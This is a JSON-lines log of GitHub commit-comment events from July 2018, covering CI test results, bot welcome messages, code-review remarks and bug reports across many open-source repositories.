{"id":"7932178849","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/turbodbc-feedstock"},"payload":{"comment":{"id":29629281,"position":null,"line":null,"path":null,"commit_id":"953c5b85ecf30a4222bde6fecee466430e6bb4d6","created_at":"2018-07-07T11:05:28Z","updated_at":"2018-07-07T11:05:28Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mathmagique were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @mathmagique were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T11:05:28Z"}
{"id":"7932186062","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29629287,"position":null,"line":null,"path":null,"commit_id":"23c15f0da502011ece886a3d6bc84bfa58ad1e7d","created_at":"2018-07-07T11:12:06Z","updated_at":"2018-07-07T11:12:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement Gameplay](https://trello.com/c/ZAY0XQJa/2-implement-gameplay)"}},"created_at":"2018-07-07T11:12:06Z"}
{"id":"7932186227","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629288,"position":null,"line":null,"path":null,"commit_id":"ece1724d71ce1f8ebc476d2005fb7e172e7136f9","created_at":"2018-07-07T11:12:14Z","updated_at":"2018-07-07T11:12:14Z","author_association":"NONE","body":"Allow-Multiple-AirLoops-in-Airflow-Netwrok-Model (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ece1724d71ce1f8ebc476d2005fb7e172e7136f9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.13%25-green.png)</a>\n"}},"created_at":"2018-07-07T11:12:14Z"}
{"id":"7932187032","type":"CommitCommentEvent","actor":{"login":"JohnnyNatrium"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":29629289,"position":null,"line":null,"path":null,"commit_id":"d87df3dcdfb5929c6aef86a2288002615c5278e7","created_at":"2018-07-07T11:12:58Z","updated_at":"2018-07-07T11:12:58Z","author_association":"NONE","body":"Thanks for getting to this so soon! May I ask for an example of an instance in the SoF.def file that caused the problem? Was it one recurring type of thing? Or was only the RTCW problem addressed?"}},"created_at":"2018-07-07T11:12:58Z"}
{"id":"7932188254","type":"CommitCommentEvent","actor":{"login":"weitingliang"},"repo":{"name":"xuxueli/xxl-job"},"payload":{"comment":{"id":29629290,"position":null,"line":null,"path":null,"commit_id":"04abd8847513bb18f4e5421da4787c5daafae8cb","created_at":"2018-07-07T11:14:08Z","updated_at":"2018-07-07T11:14:08Z","author_association":"NONE","body":"前段时间使用了动态匹配数据库功能，运行稳定。由于项目需要，想实现web系统动态匹配数据库功能，根据用户id去动态匹配，可以给些提示嘛"}},"created_at":"2018-07-07T11:14:08Z"}
{"id":"7932192090","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629299,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T11:17:42Z","updated_at":"2018-07-07T11:17:42Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T11:17:42Z"}
{"id":"7932193183","type":"CommitCommentEvent","actor":{"login":"nerd-deus"},"repo":{"name":"siigrid/GPA-calculator"},"payload":{"comment":{"id":29629301,"position":null,"line":null,"path":null,"commit_id":"a88ccde0d77255b36cd7662960c5ad6cb37dd390","created_at":"2018-07-07T11:18:43Z","updated_at":"2018-07-07T11:18:43Z","author_association":"NONE","body":"Yeah, just making sure my program is not plagiarized in any way. "}},"created_at":"2018-07-07T11:18:43Z"}
{"id":"7932193342","type":"CommitCommentEvent","actor":{"login":"xeroc"},"repo":{"name":"bitshares/bitshares-core"},"payload":{"comment":{"id":29629303,"position":2,"line":null,"path":"tests/slow_tests/main.cpp","commit_id":"00c91880cc7cc89d55abfcaa8c8f1d08bcdf56b0","created_at":"2018-07-07T11:18:52Z","updated_at":"2018-07-07T11:18:52Z","author_association":"MEMBER","body":"Can you PLEASE use another copyright here? Cryptonomex doesnt contribute code for years :/"}},"created_at":"2018-07-07T11:18:52Z"}
{"id":"7932204083","type":"CommitCommentEvent","actor":{"login":"ryu3065"},"repo":{"name":"Backend-Masters/report"},"payload":{"comment":{"id":29629318,"position":null,"line":null,"path":null,"commit_id":"707d6c505a8bf461b946ebe826aaa0e4c89999e6","created_at":"2018-07-07T11:28:26Z","updated_at":"2018-07-07T11:28:26Z","author_association":"CONTRIBUTOR","body":"발표자료 upload"}},"created_at":"2018-07-07T11:28:26Z"}
{"id":"7932204202","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29629319,"position":48,"line":1357,"path":"test/testconstructors.cpp","commit_id":"61c56eda44757760a2ad4ffc1ae31bfa51a4f1a0","created_at":"2018-07-07T11:28:31Z","updated_at":"2018-07-07T11:28:31Z","author_association":"OWNER","body":"Why FN? The `m_SemVar` has no variables so there is nothing to initialize."}},"created_at":"2018-07-07T11:28:31Z"}
{"id":"7932204689","type":"CommitCommentEvent","actor":{"login":"rao-aditya"},"repo":{"name":"jenkins-pipeline-training/intro-pipeline"},"payload":{"comment":{"id":29629320,"position":null,"line":null,"path":null,"commit_id":"29efb55c6f988e367ecac5717bb0ccdcd495e6e8","created_at":"2018-07-07T11:28:57Z","updated_at":"2018-07-07T11:28:57Z","author_association":"CONTRIBUTOR","body":"org.jenkinsci.plugins.credentialsbinding.impl.CredentialNotFoundException: password\r\n\r\n\tat org.jenkinsci.plugins.pipeline.modeldefinition.model.CredentialsBindingHandler.forId(CredentialsBindingHandler.java:107)\r\n\r\n\tat org.jenkinsci.plugins.pipeline.modeldefinition.model.CredentialsBindingHandler$forId.call(Unknown Source)\r\n"}},"created_at":"2018-07-07T11:28:57Z"}
{"id":"7932206133","type":"CommitCommentEvent","actor":{"login":"danikf"},"repo":{"name":"e066377/tik4net"},"payload":{"comment":{"id":29629326,"position":null,"line":null,"path":null,"commit_id":"efe89be817bafdac4c6a0e969f2420a5652cbd3a","created_at":"2018-07-07T11:30:05Z","updated_at":"2018-07-07T11:30:05Z","author_association":"NONE","body":"Hi - what about pull request?\r\nD"}},"created_at":"2018-07-07T11:30:05Z"}
{"id":"7932208890","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29629335,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T11:32:20Z","updated_at":"2018-07-07T11:32:20Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2746 of 2932 tests passed, 71 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 206 tests had: EIO diffs.\n * 100 tests had: MTR small diffs.\n * 173 tests had: Table big diffs.\n * 164 tests had: ESO small diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 25 tests had: Table small diffs.\n * 6 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 437\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T11:32:20Z"}
{"id":"7932209267","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29629336,"position":null,"line":null,"path":null,"commit_id":"fbefd8f844320ff21f470035a8915257cd674208","created_at":"2018-07-07T11:32:40Z","updated_at":"2018-07-07T11:32:40Z","author_association":"MEMBER","body":"what was decided. because I actually pixel pushed with Nicolas & Brian to have the previous behavior 🤷‍♂️"}},"created_at":"2018-07-07T11:32:40Z"}
{"id":"7932209675","type":"CommitCommentEvent","actor":{"login":"danikf"},"repo":{"name":"sebastienwarin/tik4net"},"payload":{"comment":{"id":29629337,"position":null,"line":null,"path":null,"commit_id":"3c565d4dbcf068929639459e303b525427738261","created_at":"2018-07-07T11:33:03Z","updated_at":"2018-07-07T11:33:03Z","author_association":"NONE","body":"Hi - what about merging new entities into main branch?\r\n\r\nD"}},"created_at":"2018-07-07T11:33:03Z"}
{"id":"7932210044","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29629339,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-07T11:33:24Z","updated_at":"2018-07-07T11:33:24Z","author_association":"NONE","body":"ooh , ping me if it's working"}},"created_at":"2018-07-07T11:33:24Z"}
{"id":"7932210459","type":"CommitCommentEvent","actor":{"login":"dhruvdalsaniya1995"},"repo":{"name":"dhruvdalsaniya1995/Zingat"},"payload":{"comment":{"id":29629341,"position":null,"line":null,"path":null,"commit_id":"ec3afa81396a67a300988c98938d7853908ce742","created_at":"2018-07-07T11:33:50Z","updated_at":"2018-07-07T11:33:50Z","author_association":"OWNER","body":"\r\n[config.txt](https://github.com/dhruvdalsaniya1995/Zingat/files/2172724/config.txt)\r\n\r\n"}},"created_at":"2018-07-07T11:33:50Z"}
{"id":"7932210748","type":"CommitCommentEvent","actor":{"login":"palomabareli"},"repo":{"name":"training-center/mentoria"},"payload":{"comment":{"id":29629342,"position":4,"line":21,"path":"mentors-list.md","commit_id":"37f0adcd1cd64d0a00299b402e7b600c9ce6070b","created_at":"2018-07-07T11:34:08Z","updated_at":"2018-07-07T11:34:08Z","author_association":"NONE","body":"+| [Paloma Bareli Ribeiro](https://www.linkedin.com/in/palomaribeiro1) | BACK-END/BI (SSIS, SSAS, SSRS, SQL Server) + PYTHON | TWITTER | @Paloma_Bareli |"}},"created_at":"2018-07-07T11:34:08Z"}
{"id":"7932212524","type":"CommitCommentEvent","actor":{"login":"meriadec"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29629344,"position":null,"line":null,"path":null,"commit_id":"fbefd8f844320ff21f470035a8915257cd674208","created_at":"2018-07-07T11:35:43Z","updated_at":"2018-07-07T11:35:43Z","author_association":"MEMBER","body":"Also pixel polish. NVM, we can easily change that ;)"}},"created_at":"2018-07-07T11:35:43Z"}
{"id":"7932212578","type":"CommitCommentEvent","actor":{"login":"warmthless"},"repo":{"name":"warmthless/LeetCode"},"payload":{"comment":{"id":29629345,"position":null,"line":null,"path":null,"commit_id":"fb121b1c6f069d7ddcd83c463ec9f1718419fd4d","created_at":"2018-07-07T11:35:47Z","updated_at":"2018-07-07T11:35:47Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-07T11:35:47Z"}
{"id":"7932214564","type":"CommitCommentEvent","actor":{"login":"bluce-lee"},"repo":{"name":"bluce-lee/JavaWeb"},"payload":{"comment":{"id":29629347,"position":null,"line":null,"path":null,"commit_id":"504765c778d3a4c0fd3e3ab3d563eddcc692ad09","created_at":"2018-07-07T11:37:30Z","updated_at":"2018-07-07T11:37:30Z","author_association":"OWNER","body":"J2EE"}},"created_at":"2018-07-07T11:37:30Z"}
{"id":"7932215541","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29629351,"position":174,"line":361,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-07T11:38:24Z","updated_at":"2018-07-07T11:38:24Z","author_association":"NONE","body":"ack"}},"created_at":"2018-07-07T11:38:24Z"}
{"id":"7932215807","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"LedgerHQ/ledger-live-desktop"},"payload":{"comment":{"id":29629352,"position":null,"line":null,"path":null,"commit_id":"fbefd8f844320ff21f470035a8915257cd674208","created_at":"2018-07-07T11:38:38Z","updated_at":"2018-07-07T11:38:38Z","author_association":"MEMBER","body":"i guess we didn't anticipated the very wide screens ;) that's ok for now.\r\njust feel this is a bit weird 🤔  \r\n<img width=\"1290\" alt=\"capture d ecran 2018-07-07 a 13 38 14\" src=\"https://user-images.githubusercontent.com/211411/42410509-0caa97e6-81eb-11e8-8dec-b038522946d7.png\">\r\n"}},"created_at":"2018-07-07T11:38:38Z"}
{"id":"7932217498","type":"CommitCommentEvent","actor":{"login":"alexbool"},"repo":{"name":"nrc/derive-new"},"payload":{"comment":{"id":29629355,"position":null,"line":null,"path":null,"commit_id":"301346f0424a20445a817f9c67891c420aa9e554","created_at":"2018-07-07T11:40:05Z","updated_at":"2018-07-07T11:40:05Z","author_association":"NONE","body":"@nrc could this be released?"}},"created_at":"2018-07-07T11:40:05Z"}
{"id":"7932218440","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sortedcollections-feedstock"},"payload":{"comment":{"id":29629356,"position":null,"line":null,"path":null,"commit_id":"2ce22e35cb53616393af6b27507fcf929229bacc","created_at":"2018-07-07T11:40:44Z","updated_at":"2018-07-07T11:40:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @grantjenks were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @grantjenks were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T11:40:44Z"}
{"id":"7932218780","type":"CommitCommentEvent","actor":{"login":"hchourasia"},"repo":{"name":"hchourasia/100DaysOfMLCode.github.io"},"payload":{"comment":{"id":29629357,"position":null,"line":null,"path":null,"commit_id":"6a17c1602861edd942510fb51ccbb2568b66cf6a","created_at":"2018-07-07T11:41:04Z","updated_at":"2018-07-07T11:41:04Z","author_association":"OWNER","body":"unable to see  the website update :("}},"created_at":"2018-07-07T11:41:04Z"}
{"id":"7932221264","type":"CommitCommentEvent","actor":{"login":"ManolisGledsodakis"},"repo":{"name":"Ascoware/get-iplayer-automator"},"payload":{"comment":{"id":29629360,"position":null,"line":null,"path":null,"commit_id":"f3c799f799aa2867532a9ecf12a34df0cb64a291","created_at":"2018-07-07T11:43:11Z","updated_at":"2018-07-07T11:43:11Z","author_association":"NONE","body":"Sorry if I'm in the wrong place. If I am, where should I report issues?\r\nSince updating to 1.13.11 today, ITV is OK but GiA doesn't download BBC. This *could* be a VPN problem at my end but I have no way of telling. Grateful for any helpful comments.\r\n\r\nBBC Download (ID=b0b9fs4q): Downloading Click - Inside MIT's AI Workshop\r\nINFO: 1 total programmes\r\nERROR: Failed to download URL (3/3): https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/iptv-all/vpid/b0b9frz8?cb=60193\r\nERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\r\nERROR: Failed to download URL (3/3): https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/pc/vpid/b0b9frz8?cb=41723\r\nERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\r\nERROR: Failed to download URL (3/3): https://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/b0b9frz8?cb=26014\r\nERROR: Response: 500 Can't connect to open.live.bbc.co.uk:443\r\nWARNING: No media streams found for requested programme versions and recording modes.\r\nWARNING: The programme may no longer be available - check the iPlayer site.\r\nWARNING: If you are outside the UK, check with the provider to find out if your VPN/VPS/Smart DNS/web proxy has been blocked.\r\nBBC Download (ID=b0b9fs4q): Click - Inside MIT's AI Workshop Failed\r\nAppController: Downloads Finished\r\n"}},"created_at":"2018-07-07T11:43:11Z"}
{"id":"7932223011","type":"CommitCommentEvent","actor":{"login":"xuwei-k"},"repo":{"name":"scalapb/ScalaPB"},"payload":{"comment":{"id":29629361,"position":null,"line":null,"path":null,"commit_id":"6596e6500dc50916285921cf89e3c4b991a60341","created_at":"2018-07-07T11:44:43Z","updated_at":"2018-07-07T11:44:43Z","author_association":"CONTRIBUTOR","body":"https://travis-ci.org/scalapb/ScalaPB/jobs/400932923#L742\r\n\r\n```\r\n--scala_out: issue286_flat2.proto: a package name is required when flat_package is set. The package name can be provided by either a package statement, or by setting java_package or  scala_package options.\r\n[error] java.lang.RuntimeException: protoc returned exit code: 1\r\n[error] \tat scala.sys.package$.error(package.scala:27)\r\n```\r\n\r\nremove issue 286 tests?\r\n\r\nhttps://github.com/scalapb/ScalaPB/blob/6596e6500d/e2e/nojava/src/main/protobuf/issue286_flat2.proto"}},"created_at":"2018-07-07T11:44:43Z"}
{"id":"7932224985","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29629366,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T11:46:23Z","updated_at":"2018-07-07T11:46:23Z","author_association":"NONE","body":"Yes, I checked and found no errors."}},"created_at":"2018-07-07T11:46:23Z"}
{"id":"7932225183","type":"CommitCommentEvent","actor":{"login":"gibaBR"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29629367,"position":null,"line":null,"path":null,"commit_id":"7649d62217b79df4d89e56fb0b6de28a3f611096","created_at":"2018-07-07T11:46:31Z","updated_at":"2018-07-07T11:46:31Z","author_association":"OWNER","body":"Well, your solution works and its ready, so thats what matters!! Nice Job!\nI'll merge you code on master.\nThe Only Different thing I was doing was storing inside XML all\nInformations available when we decrypt files, and pPut all info inside\nFileData at runtime (A Dictionary maybe <TitleID, FileData>).  so we wont\nneed to decrypt them ever again, I think all operations would be faster.\n\nWhen I ran your lastest release to test, o notticed that when a game on my\ncollection was not on db.xml (Axyom Verge, 0100B1F00660E000) then game name\nappears blank on game list. Maybe it is a good idea to get that info from\nfile when not found.\n\nA good idea too is to show a message to user when it runs for first time\nand is populating cache.dat, like \"cache file not foud! It may take a while\nto create a new one.\". I have 140+ files and it took more than a minute to\nend.\n\nThis time we were doing the same thing, so it was kind of a waste of time :)\nI really think we should tell each other what we will or think of doing\nnext. I suggest using my discord channel https://discord.gg/S6H895d what do\nyou think?\n\nWhat I plan to do next is to add support to operations with SD cards.\n\nGreat Work!\n\n\n\n---\nGilberto Júnior\nhttp://raspberrybrasil.blogspot.com.br/\nhttp://www.flickr.com/photos/gibajr/\n\nOn Sat, Jul 7, 2018 at 12:28 AM, StudentBlake <notifications@github.com>\nwrote:\n\n> Check out my latest commit! I did this differently. Your way is probably\n> better, but I added a backgroundworker for loading this list and it\n> complicates the code a little.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/gibaBR/XCI-Organizer/commit/7649d62217b79df4d89e56fb0b6de28a3f611096#commitcomment-29628184>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVRl6kaX9yxRt5nvrqlLuJgWl7qBAPLOks5uECrrgaJpZM4VGNbt>\n> .\n>\n"}},"created_at":"2018-07-07T11:46:31Z"}
{"id":"7932225202","type":"CommitCommentEvent","actor":{"login":"qwelias"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29629368,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-07T11:46:32Z","updated_at":"2018-07-07T11:46:32Z","author_association":"NONE","body":"@jsdevel \r\n\r\n@0.23.0\r\n```js\r\nclient.myFunctionAsync(args).then((result) => {})\r\n```\r\n\r\n@0.24.0\r\n```js\r\nclient.myFunctionAsync(args).then(([result, rawResponse, soapHeader, rawRequest]) => {})\r\n```"}},"created_at":"2018-07-07T11:46:32Z"}
{"id":"7932227756","type":"CommitCommentEvent","actor":{"login":"ciscoheat"},"repo":{"name":"ciscoheat/immutable-hx"},"payload":{"comment":{"id":29629372,"position":28,"line":27,"path":"src/immutable/BuildImmutableClass.hx","commit_id":"6b79e6a132237a11cd736566bc4a16d6a9e56361","created_at":"2018-07-07T11:48:51Z","updated_at":"2018-07-07T11:48:51Z","author_association":"OWNER","body":"Ok, I thought that too, but since you said 4.0.0 I assumed some quirks."}},"created_at":"2018-07-07T11:48:51Z"}
{"id":"7932228722","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29629374,"position":177,"line":364,"path":"app/src/main/java/d/d/meshenger/MainService.java","commit_id":"e96867ec3f26475b7ce3f5121d006d143506ae10","created_at":"2018-07-07T11:49:44Z","updated_at":"2018-07-07T11:49:44Z","author_association":"NONE","body":"ok, vielleicht wäre eine Hilfsfunktion für den Vergleich schöner. Aber da muss ich jetzt keine Haare spalten. :P"}},"created_at":"2018-07-07T11:49:44Z"}
{"id":"7932231299","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29629378,"position":null,"line":null,"path":null,"commit_id":"806862f0a360de93af8857143208ee2b01c747ad","created_at":"2018-07-07T11:51:51Z","updated_at":"2018-07-07T11:51:51Z","author_association":"NONE","body":"Sieht gut aus!"}},"created_at":"2018-07-07T11:51:51Z"}
{"id":"7932231563","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29629379,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T11:52:01Z","updated_at":"2018-07-07T11:52:01Z","author_association":"NONE","body":"Solved, there is a bug in Peatio that only allows solvency proof to be made on a newly added currency if a new user is added or the database reset.\r\n\r\n```\r\n*** Fetching nbr total assets ***\r\naddress balances fetched.\r\n\r\n*** Start dash liability proof generation ***\r\nGenerating root node ..\r\nGenerating partial trees ..\r\n1 partial trees generated.\r\n\r\n*** Fetching dash total assets ***\r\naddress balances fetched.\r\nComplete.\r\n```\r\n\r\n"}},"created_at":"2018-07-07T11:52:01Z"}
{"id":"7932232233","type":"CommitCommentEvent","actor":{"login":"hareeshrzt"},"repo":{"name":"hareeshrzt/Redis-server-DockerFile"},"payload":{"comment":{"id":29629380,"position":2,"line":2,"path":"README.md","commit_id":"03309d04a085281f841344b6fcb36ea4c49a0bcb","created_at":"2018-07-07T11:52:36Z","updated_at":"2018-07-07T11:52:36Z","author_association":"OWNER","body":"Using custom port and log directory"}},"created_at":"2018-07-07T11:52:36Z"}
{"id":"7932232239","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629381,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T11:52:36Z","updated_at":"2018-07-07T11:52:36Z","author_association":"MEMBER","body":"at first glance, this seems to be a gigantic BC break. What happens to modules that use the old methods?"}},"created_at":"2018-07-07T11:52:36Z"}
{"id":"7932232999","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629382,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T11:53:21Z","updated_at":"2018-07-07T11:53:21Z","author_association":"MEMBER","body":"Nothing. The old class is a subclass of the new one."}},"created_at":"2018-07-07T11:53:21Z"}
{"id":"7932234044","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629385,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T11:54:18Z","updated_at":"2018-07-07T11:54:18Z","author_association":"MEMBER","body":"https://github.com/sensiolabs/SensioFrameworkExtraBundle/blob/master/Configuration/Route.php\r\nhttps://github.com/sensiolabs/SensioFrameworkExtraBundle/blob/master/Configuration/Method.php"}},"created_at":"2018-07-07T11:54:18Z"}
{"id":"7932234463","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629387,"position":6,"line":6,"path":"package.json","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T11:54:42Z","updated_at":"2018-07-07T11:54:42Z","author_association":"NONE","body":"Вот лучше крыжики не ставить"}},"created_at":"2018-07-07T11:54:42Z"}
{"id":"7932234669","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629388,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T11:54:54Z","updated_at":"2018-07-07T11:54:54Z","author_association":"MEMBER","body":"Also we still have the old classes included. I've only done the changes to be forward compatible."}},"created_at":"2018-07-07T11:54:54Z"}
{"id":"7932236095","type":"CommitCommentEvent","actor":{"login":"craigh"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629391,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T11:56:14Z","updated_at":"2018-07-07T11:56:14Z","author_association":"MEMBER","body":"sounds OK.\r\n\r\nIsn't the `Foo::class` notation not compatible with php 5.6?"}},"created_at":"2018-07-07T11:56:14Z"}
{"id":"7932236866","type":"CommitCommentEvent","actor":{"login":"davidmccormick"},"repo":{"name":"kubernetes-incubator/kube-aws"},"payload":{"comment":{"id":29629395,"position":null,"line":null,"path":null,"commit_id":"b646541677b28fc8c4813b6109d135ec2ed7ebf5","created_at":"2018-07-07T11:56:53Z","updated_at":"2018-07-07T11:56:53Z","author_association":"CONTRIBUTOR","body":"Can't test this until Monday morning - does it include both node and nodepool in the role column when doing a kubectl get nodes?"}},"created_at":"2018-07-07T11:56:53Z"}
{"id":"7932238675","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"VukZh/JS-10"},"payload":{"comment":{"id":29629399,"position":7,"line":7,"path":"public/index.html","commit_id":"6dc57efa5ccc6b9c51267b33a5720527bd4be7d0","created_at":"2018-07-07T11:58:38Z","updated_at":"2018-07-07T11:58:38Z","author_association":"NONE","body":"Не понял, зачем два дива, и зачем два рендера, если можно сделать один."}},"created_at":"2018-07-07T11:58:38Z"}
{"id":"7932242463","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29629407,"position":null,"line":null,"path":null,"commit_id":"44d65785b0623acfbd5a8699de23fc6e549135cb","created_at":"2018-07-07T12:01:31Z","updated_at":"2018-07-07T12:01:31Z","author_association":"MEMBER","body":"`Foo::class` works since PHP 5.5 - why do you ask?"}},"created_at":"2018-07-07T12:01:31Z"}
